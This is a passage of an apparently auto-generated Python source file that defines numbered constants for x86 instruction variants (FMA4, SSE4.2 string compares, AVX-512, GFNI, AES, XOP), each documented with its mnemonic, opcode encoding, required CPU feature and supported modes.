VEX_VFMSUBADDPS_YMM_YMM_YMM_YMMM256: int = 3966
"""
``VFMSUBADDPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 5E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPD_XMM_XMM_XMMM128_XMM: int = 3967
"""
``VFMSUBADDPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 5F /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPD_YMM_YMM_YMMM256_YMM: int = 3968
"""
``VFMSUBADDPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 5F /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPD_XMM_XMM_XMM_XMMM128: int = 3969
"""
``VFMSUBADDPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 5F /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPD_YMM_YMM_YMM_YMMM256: int = 3970
"""
``VFMSUBADDPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 5F /r /is4``
``FMA4``
``16/32/64-bit``
"""
PCMPESTRM_XMM_XMMM128_IMM8: int = 3971
"""
``PCMPESTRM xmm1, xmm2/m128, imm8``
``66 0F 3A 60 /r ib``
``SSE4.2``
``16/32/64-bit``
"""
PCMPESTRM64_XMM_XMMM128_IMM8: int = 3972
"""
``PCMPESTRM64 xmm1, xmm2/m128, imm8``
``66 o64 0F 3A 60 /r ib``
``SSE4.2``
``64-bit``
"""
VEX_VPCMPESTRM_XMM_XMMM128_IMM8: int = 3973
"""
``VPCMPESTRM xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W0 60 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPESTRM64_XMM_XMMM128_IMM8: int = 3974
"""
``VPCMPESTRM64 xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W1 60 /r ib``
``AVX``
``64-bit``
"""
PCMPESTRI_XMM_XMMM128_IMM8: int = 3975
"""
``PCMPESTRI xmm1, xmm2/m128, imm8``
``66 0F 3A 61 /r ib``
``SSE4.2``
``16/32/64-bit``
"""
PCMPESTRI64_XMM_XMMM128_IMM8: int = 3976
"""
``PCMPESTRI64 xmm1, xmm2/m128, imm8``
``66 o64 0F 3A 61 /r ib``
``SSE4.2``
``64-bit``
"""
VEX_VPCMPESTRI_XMM_XMMM128_IMM8: int = 3977
"""
``VPCMPESTRI xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W0 61 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPESTRI64_XMM_XMMM128_IMM8: int = 3978
"""
``VPCMPESTRI64 xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W1 61 /r ib``
``AVX``
``64-bit``
"""
PCMPISTRM_XMM_XMMM128_IMM8: int = 3979
"""
``PCMPISTRM xmm1, xmm2/m128, imm8``
``66 0F 3A 62 /r ib``
``SSE4.2``
``16/32/64-bit``
"""
VEX_VPCMPISTRM_XMM_XMMM128_IMM8: int = 3980
"""
``VPCMPISTRM xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.WIG 62 /r ib``
``AVX``
``16/32/64-bit``
"""
PCMPISTRI_XMM_XMMM128_IMM8: int = 3981
"""
``PCMPISTRI xmm1, xmm2/m128, imm8``
``66 0F 3A 63 /r ib``
``SSE4.2``
``16/32/64-bit``
"""
VEX_VPCMPISTRI_XMM_XMMM128_IMM8: int = 3982
"""
``VPCMPISTRI xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.WIG 63 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VFPCLASSPS_KR_K1_XMMM128B32_IMM8: int = 3983
"""
``VFPCLASSPS k2 {k1}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 66 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSPS_KR_K1_YMMM256B32_IMM8: int = 3984
"""
``VFPCLASSPS k2 {k1}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 66 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSPS_KR_K1_ZMMM512B32_IMM8: int = 3985
"""
``VFPCLASSPS k2 {k1}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 66 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSPD_KR_K1_XMMM128B64_IMM8: int = 3986
"""
``VFPCLASSPD k2 {k1}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 66 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSPD_KR_K1_YMMM256B64_IMM8: int = 3987
"""
``VFPCLASSPD k2 {k1}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 66 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSPD_KR_K1_ZMMM512B64_IMM8: int = 3988
"""
``VFPCLASSPD k2 {k1}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 66 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSSS_KR_K1_XMMM32_IMM8: int = 3989
"""
``VFPCLASSSS k2 {k1}, xmm2/m32, imm8``
``EVEX.LIG.66.0F3A.W0 67 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSSD_KR_K1_XMMM64_IMM8: int = 3990
"""
``VFPCLASSSD k2 {k1}, xmm2/m64, imm8``
``EVEX.LIG.66.0F3A.W1 67 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_VFMADDPS_XMM_XMM_XMMM128_XMM: int = 3991
"""
``VFMADDPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 68 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPS_YMM_YMM_YMMM256_YMM: int = 3992
"""
``VFMADDPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 68 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPS_XMM_XMM_XMM_XMMM128: int = 3993
"""
``VFMADDPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 68 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPS_YMM_YMM_YMM_YMMM256: int = 3994
"""
``VFMADDPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 68 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPD_XMM_XMM_XMMM128_XMM: int = 3995
"""
``VFMADDPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 69 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPD_YMM_YMM_YMMM256_YMM: int = 3996
"""
``VFMADDPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 69 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPD_XMM_XMM_XMM_XMMM128: int = 3997
"""
``VFMADDPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 69 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPD_YMM_YMM_YMM_YMMM256: int = 3998
"""
``VFMADDPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 69 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSS_XMM_XMM_XMMM32_XMM: int = 3999
"""
``VFMADDSS xmm1, xmm2, xmm3/m32, xmm4``
``VEX.LIG.66.0F3A.W0 6A /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSS_XMM_XMM_XMM_XMMM32: int = 4000
"""
``VFMADDSS xmm1, xmm2, xmm3, xmm4/m32``
``VEX.LIG.66.0F3A.W1 6A /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSD_XMM_XMM_XMMM64_XMM: int = 4001
"""
``VFMADDSD xmm1, xmm2, xmm3/m64, xmm4``
``VEX.LIG.66.0F3A.W0 6B /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSD_XMM_XMM_XMM_XMMM64: int = 4002
"""
``VFMADDSD xmm1, xmm2, xmm3, xmm4/m64``
``VEX.LIG.66.0F3A.W1 6B /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPS_XMM_XMM_XMMM128_XMM: int = 4003
"""
``VFMSUBPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 6C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPS_YMM_YMM_YMMM256_YMM: int = 4004
"""
``VFMSUBPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 6C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPS_XMM_XMM_XMM_XMMM128: int = 4005
"""
``VFMSUBPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 6C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPS_YMM_YMM_YMM_YMMM256: int = 4006
"""
``VFMSUBPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 6C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPD_XMM_XMM_XMMM128_XMM: int = 4007
"""
``VFMSUBPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 6D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPD_YMM_YMM_YMMM256_YMM: int = 4008
"""
``VFMSUBPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 6D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPD_XMM_XMM_XMM_XMMM128: int = 4009
"""
``VFMSUBPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 6D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPD_YMM_YMM_YMM_YMMM256: int = 4010
"""
``VFMSUBPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 6D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBSS_XMM_XMM_XMMM32_XMM: int = 4011
"""
``VFMSUBSS xmm1, xmm2, xmm3/m32, xmm4``
``VEX.LIG.66.0F3A.W0 6E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBSS_XMM_XMM_XMM_XMMM32: int = 4012
"""
``VFMSUBSS xmm1, xmm2, xmm3, xmm4/m32``
``VEX.LIG.66.0F3A.W1 6E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBSD_XMM_XMM_XMMM64_XMM: int = 4013
"""
``VFMSUBSD xmm1, xmm2, xmm3/m64, xmm4``
``VEX.LIG.66.0F3A.W0 6F /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBSD_XMM_XMM_XMM_XMMM64: int = 4014
"""
``VFMSUBSD xmm1, xmm2, xmm3, xmm4/m64``
``VEX.LIG.66.0F3A.W1 6F /r /is4``
``FMA4``
``16/32/64-bit``
"""
EVEX_VPSHLDW_XMM_K1Z_XMM_XMMM128_IMM8: int = 4015
"""
``VPSHLDW xmm1 {k1}{z}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W1 70 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDW_YMM_K1Z_YMM_YMMM256_IMM8: int = 4016
"""
``VPSHLDW ymm1 {k1}{z}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W1 70 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 4017
"""
``VPSHLDW zmm1 {k1}{z}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W1 70 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 4018
"""
``VPSHLDD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 71 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 4019
"""
``VPSHLDD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 71 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 4020
"""
``VPSHLDD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 71 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4021
"""
``VPSHLDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 71 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4022
"""
``VPSHLDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 71 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4023
"""
``VPSHLDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 71 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDW_XMM_K1Z_XMM_XMMM128_IMM8: int = 4024
"""
``VPSHRDW xmm1 {k1}{z}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W1 72 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDW_YMM_K1Z_YMM_YMMM256_IMM8: int = 4025
"""
``VPSHRDW ymm1 {k1}{z}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W1 72 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 4026
"""
``VPSHRDW zmm1 {k1}{z}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W1 72 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 4027
"""
``VPSHRDD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 73 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 4028
"""
``VPSHRDD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 73 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 4029
"""
``VPSHRDD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 73 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4030
"""
``VPSHRDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 73 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4031
"""
``VPSHRDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 73 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4032
"""
``VPSHRDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 73 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
VEX_VFNMADDPS_XMM_XMM_XMMM128_XMM: int = 4033
"""
``VFNMADDPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 78 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPS_YMM_YMM_YMMM256_YMM: int = 4034
"""
``VFNMADDPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 78 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPS_XMM_XMM_XMM_XMMM128: int = 4035
"""
``VFNMADDPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 78 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPS_YMM_YMM_YMM_YMMM256: int = 4036
"""
``VFNMADDPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 78 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPD_XMM_XMM_XMMM128_XMM: int = 4037
"""
``VFNMADDPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 79 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPD_YMM_YMM_YMMM256_YMM: int = 4038
"""
``VFNMADDPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 79 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPD_XMM_XMM_XMM_XMMM128: int = 4039
"""
``VFNMADDPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 79 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPD_YMM_YMM_YMM_YMMM256: int = 4040
"""
``VFNMADDPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 79 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDSS_XMM_XMM_XMMM32_XMM: int = 4041
"""
``VFNMADDSS xmm1, xmm2, xmm3/m32, xmm4``
``VEX.LIG.66.0F3A.W0 7A /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDSS_XMM_XMM_XMM_XMMM32: int = 4042
"""
``VFNMADDSS xmm1, xmm2, xmm3, xmm4/m32``
``VEX.LIG.66.0F3A.W1 7A /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDSD_XMM_XMM_XMMM64_XMM: int = 4043
"""
``VFNMADDSD xmm1, xmm2, xmm3/m64, xmm4``
``VEX.LIG.66.0F3A.W0 7B /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDSD_XMM_XMM_XMM_XMMM64: int = 4044
"""
``VFNMADDSD xmm1, xmm2, xmm3, xmm4/m64``
``VEX.LIG.66.0F3A.W1 7B /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPS_XMM_XMM_XMMM128_XMM: int = 4045
"""
``VFNMSUBPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 7C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPS_YMM_YMM_YMMM256_YMM: int = 4046
"""
``VFNMSUBPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 7C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPS_XMM_XMM_XMM_XMMM128: int = 4047
"""
``VFNMSUBPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 7C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPS_YMM_YMM_YMM_YMMM256: int = 4048
"""
``VFNMSUBPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 7C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPD_XMM_XMM_XMMM128_XMM: int = 4049
"""
``VFNMSUBPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 7D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPD_YMM_YMM_YMMM256_YMM: int = 4050
"""
``VFNMSUBPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 7D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPD_XMM_XMM_XMM_XMMM128: int = 4051
"""
``VFNMSUBPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 7D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPD_YMM_YMM_YMM_YMMM256: int = 4052
"""
``VFNMSUBPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 7D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBSS_XMM_XMM_XMMM32_XMM: int = 4053
"""
``VFNMSUBSS xmm1, xmm2, xmm3/m32, xmm4``
``VEX.LIG.66.0F3A.W0 7E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBSS_XMM_XMM_XMM_XMMM32: int = 4054
"""
``VFNMSUBSS xmm1, xmm2, xmm3, xmm4/m32``
``VEX.LIG.66.0F3A.W1 7E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBSD_XMM_XMM_XMMM64_XMM: int = 4055
"""
``VFNMSUBSD xmm1, xmm2, xmm3/m64, xmm4``
``VEX.LIG.66.0F3A.W0 7F /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBSD_XMM_XMM_XMM_XMMM64: int = 4056
"""
``VFNMSUBSD xmm1, xmm2, xmm3, xmm4/m64``
``VEX.LIG.66.0F3A.W1 7F /r /is4``
``FMA4``
``16/32/64-bit``
"""
SHA1RNDS4_XMM_XMMM128_IMM8: int = 4057
"""
``SHA1RNDS4 xmm1, xmm2/m128, imm8``
``NP 0F 3A CC /r ib``
``SHA``
``16/32/64-bit``
"""
GF2P8AFFINEQB_XMM_XMMM128_IMM8: int = 4058
"""
``GF2P8AFFINEQB xmm1, xmm2/m128, imm8``
``66 0F 3A CE /r ib``
``GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8AFFINEQB_XMM_XMM_XMMM128_IMM8: int = 4059
"""
``VGF2P8AFFINEQB xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.W1 CE /r ib``
``AVX and GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8AFFINEQB_YMM_YMM_YMMM256_IMM8: int = 4060
"""
``VGF2P8AFFINEQB ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.W1 CE /r ib``
``AVX and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEQB_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4061
"""
``VGF2P8AFFINEQB xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 CE /r ib``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEQB_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4062
"""
``VGF2P8AFFINEQB ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 CE /r ib``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEQB_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4063
"""
``VGF2P8AFFINEQB zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 CE /r ib``
``AVX512F and GFNI``
``16/32/64-bit``
"""
GF2P8AFFINEINVQB_XMM_XMMM128_IMM8: int = 4064
"""
``GF2P8AFFINEINVQB xmm1, xmm2/m128, imm8``
``66 0F 3A CF /r ib``
``GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8AFFINEINVQB_XMM_XMM_XMMM128_IMM8: int = 4065
"""
``VGF2P8AFFINEINVQB xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.W1 CF /r ib``
``AVX and GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8AFFINEINVQB_YMM_YMM_YMMM256_IMM8: int = 4066
"""
``VGF2P8AFFINEINVQB ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.W1 CF /r ib``
``AVX and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEINVQB_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4067
"""
``VGF2P8AFFINEINVQB xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 CF /r ib``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEINVQB_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4068
"""
``VGF2P8AFFINEINVQB ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 CF /r ib``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEINVQB_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4069
"""
``VGF2P8AFFINEINVQB zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 CF /r ib``
``AVX512F and GFNI``
``16/32/64-bit``
"""
AESKEYGENASSIST_XMM_XMMM128_IMM8: int = 4070
"""
``AESKEYGENASSIST xmm1, xmm2/m128, imm8``
``66 0F 3A DF /r ib``
``AES``
``16/32/64-bit``
"""
VEX_VAESKEYGENASSIST_XMM_XMMM128_IMM8: int = 4071
"""
``VAESKEYGENASSIST xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.WIG DF /r ib``
``AES and AVX``
``16/32/64-bit``
"""
VEX_RORX_R32_RM32_IMM8: int = 4072
"""
``RORX r32, r/m32, imm8``
``VEX.LZ.F2.0F3A.W0 F0 /r ib``
``BMI2``
``16/32/64-bit``
"""
VEX_RORX_R64_RM64_IMM8: int = 4073
"""
``RORX r64, r/m64, imm8``
``VEX.LZ.F2.0F3A.W1 F0 /r ib``
``BMI2``
``64-bit``
"""
XOP_VPMACSSWW_XMM_XMM_XMMM128_XMM: int = 4074
"""
``VPMACSSWW xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 85 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSSWD_XMM_XMM_XMMM128_XMM: int = 4075
"""
``VPMACSSWD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 86 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSSDQL_XMM_XMM_XMMM128_XMM: int = 4076
"""
``VPMACSSDQL xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 87 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSSDD_XMM_XMM_XMMM128_XMM: int = 4077
"""
``VPMACSSDD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 8E /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSSDQH_XMM_XMM_XMMM128_XMM: int = 4078
"""
``VPMACSSDQH xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 8F /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSWW_XMM_XMM_XMMM128_XMM: int = 4079
"""
``VPMACSWW xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 95 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSWD_XMM_XMM_XMMM128_XMM: int = 4080
"""
``VPMACSWD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 96 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSDQL_XMM_XMM_XMMM128_XMM: int = 4081
"""
``VPMACSDQL xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 97 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSDD_XMM_XMM_XMMM128_XMM: int = 4082
"""
``VPMACSDD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 9E /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSDQH_XMM_XMM_XMMM128_XMM: int = 4083
"""
``VPMACSDQH xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 9F /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPCMOV_XMM_XMM_XMMM128_XMM: int = 4084
"""
``VPCMOV xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 A2 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPCMOV_YMM_YMM_YMMM256_YMM: int = 4085
"""
``VPCMOV ymm1, ymm2, ymm3/m256, ymm4``
